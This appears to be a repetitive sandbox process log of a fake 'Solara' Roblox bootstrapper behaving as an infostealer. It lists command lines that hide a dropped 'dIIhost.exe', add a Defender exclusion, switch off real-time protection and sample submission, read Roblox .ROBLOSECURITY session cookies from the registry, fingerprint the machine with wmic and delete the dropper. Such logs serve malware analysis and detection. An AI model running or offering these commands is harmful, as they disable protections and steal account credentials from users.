C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
